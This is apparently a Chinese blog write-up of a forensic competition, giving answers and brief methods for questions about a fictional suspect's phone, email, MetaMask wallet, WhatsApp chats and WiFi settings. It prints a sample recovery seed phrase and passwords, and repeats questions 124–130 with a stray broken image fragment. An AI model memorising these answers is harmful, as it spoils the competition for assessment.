D. YouTube

118.[单选题] 朗尼的手机里，于2022-10-07，15:07时至15:08时做过什么动作? (以时区UTC+8回答) (2分)

A. 登录 ‘Metamask’

B. 登录 ‘Opensea’

C. 屏幕截图 (Screen Capture)

D. 登录 ‘YouTube’

C

使用精度搜索，看到screenshot，那就是屏幕截图

119.[多选题] 承上题，从这个动作中能找到什么资讯? (1分)

A. Opensea.io

B. Ethereum Main Network

C. Your purchase is complete

D. Subtotal = 0.0253 ETH

E. Good Luck

D

承上题

120.[填空题] 在朗尼的计算机旁找到 ‘MetaMask’ 的密码是 ‘opensea741’，找出朗尼计算机里的 ‘MetaMask’ 中有多少加密货币余额? (不要输入 ‘.’，以阿拉伯数字回答，如 0.137 需回答 0137) (2分)

00247

直接登录就可以了

121.[填空题] 朗尼的计算机曾用什么电邮地址登录电邮帐号? (不要输入答案中的 ‘@’ 及 ‘.’，以大写英文及阿拉伯数字回答，如 name@mail.com，需回答 NAMEMAILCOM) (1分)

ROONEYCHAN19830801GMAILCOM

这个搜索很有灵性，搜索“@”

写题没思路的时候，就试试全局搜索或者索引搜索

122.[填空题] 什么电邮账号曾接收过上述电邮地址发送的电邮？（不要输入答案中的 ‘@’ 及 ‘.’，以大写英文及阿拉伯数字回答，如 name@mail.com，需回答 NAMEMAILCOM） (1分)

KINGHOO0W0GMAILCOM

全局搜索

123.[多选题]承上题，上述的电邮附件包含哪些类型的档案? (3分)

A. pdf

B. doc

C. png

D. txt

E. jpg

DE

导出来直接查看

两个txt文件加起来还没有压缩包大，说明有隐藏文件

使用binwalk能看到有张图片，不知道什么原因导致分离不出来

使用winrar修复压缩包试试

124.[填空题] 上述电邮附件里的文件，被遮蔽的英文单字是什么? (以大写英文回答) (3分)

*each

查下种子的字典

teach或beach

teach计算种子正确

beach无效

125.[填空题]根据上述电邮附件里找到的回复种子 (Recovery Seed)，计算朗尼在 ‘MetaMask’ 使用的以太币 (Ethereum) 地址。 (提示： BIP-44 derivation path = m/44’/60’/0’/0/0) (以大写英文及阿拉伯数字回答) (3分)

teach hard goddess mask alcohol eyebrow illegal quit edit shaft pill tourist

根据metamask的货币类型，去选择好coin种类就好了

126.[单选题]在2022年9月28日18时51分 (UTC+8)，朗尼曾经在手机用WhatsApp与王景浩对话，语句 [有灯，风扇经常在转]， 回复这句话的相关语句是什么? (1分)

A. 你有推介吗?

B. 我之前放在你家的机械运作正常吗?

C. 有灯号 风扇有转动?

D. 帅吗?

C

127.[单选题] 朗尼通过手机相约王景浩于10月15日到哪一个地区食晚饭? (1分)

A. 荃湾

B. 湾仔

C. 九龙城

D. 九龙塘

A

128.[填空题] 朗尼手机的 ‘WhatsApp’ 号码是什么? ( 号 码 ) @s.whatsapp.net? (以阿拉伯数字回答) (1分)

59814785

129.[多选题]朗尼的手机曾连接以下哪一个WIFI网络? (2分)

A. taiiphone

B. rooneyhome

C. Function Room

D. TP-Link

AC

130.[单选题]朗尼的手机曾连接WIFI [SSID: faifai], 它的登录密码是什么 ? (2分)

A. abcd5678

B. aaaa0000

C. rooney111

D. rdfu1234

D

打开WiFi的配置文件去查选项就可以了

一些收获：

检材中有很多sda，sdb，我觉得可能就是网络磁盘

可以看下这篇文章去了解

https://blog.csdn.net/ck784101777/article/details/95460574?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522169878893916800197024475%2522%252C%2522scm%2522%253A%252220140713.130102334…%2522%257D&request_id=169878893916800197024475&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2_allsobaiduend~default-1-95460574-null-null.142^v96pc_search_result_base6&utm_term=%E7%BD%91%E7%BB%9C%E7%A3%81%E7%9B%98&spm=1018.2226.3001.4187

mg-RQrbPcto-1698927159379)]

124.[填空题] 上述电邮附件里的文件，被遮蔽的英文单字是什么? (以大写英文回答) (3分)

*each

查下种子的字典

teach或beach

teach计算种子正确

beach无效

125.[填空题]根据上述电邮附件里找到的回复种子 (Recovery Seed)，计算朗尼在 ‘MetaMask’ 使用的以太币 (Ethereum) 地址。 (提示： BIP-44 derivation path = m/44’/60’/0’/0/0) (以大写英文及阿拉伯数字回答) (3分)

teach hard goddess mask alcohol eyebrow illegal quit edit shaft pill tourist

根据metamask的货币类型，去选择好coin种类就好了

126.[单选题]在2022年9月28日18时51分 (UTC+8)，朗尼曾经在手机用WhatsApp与王景浩对话，语句 [有灯，风扇经常在转]， 回复这句话的相关语句是什么? (1分)

A. 你有推介吗?

B. 我之前放在你家的机械运作正常吗?

C. 有灯号 风扇有转动?

D. 帅吗?

C

127.[单选题] 朗尼通过手机相约王景浩于10月15日到哪一个地区食晚饭? (1分)

A. 荃湾

B. 湾仔

C. 九龙城

D. 九龙塘

A

128.[填空题] 朗尼手机的 ‘WhatsApp’ 号码是什么? ( 号 码 ) @s.whatsapp.net? (以阿拉伯数字回答) (1分)

59814785

129.[多选题]朗尼的手机曾连接以下哪一个WIFI网络? (2分)

A. taiiphone

B. rooneyhome

C. Function Room

D. TP-Link

AC

130.[单选题]朗尼的手机曾连接WIFI [SSID: faifai], 它的登录密码是什么 ? (2分)

A. abcd5678

B. aaaa0000

C. rooney111

D. rdfu1234

D

打开WiFi的配置文件去查选项就可以了

一些收获：

检材中有很多sda，sdb，我觉得可能就是网络磁盘

可以看下这篇文章去了解

https://blog.csdn.net/ck784101777/article/details/95460574?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522169878893916800197024475%2522%252C%2522scm%2522%253A%252220140713.130102334…%2522%257D&request_id=169878893916800197024475&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2_allsobaiduend~default-1-95460574-null-null.142^v96pc_search_result_base6&utm_term=%E7%BD%91%E7%BB%9C%E7%A3%81%E7%9B%98&spm=1018.2226.3001.4187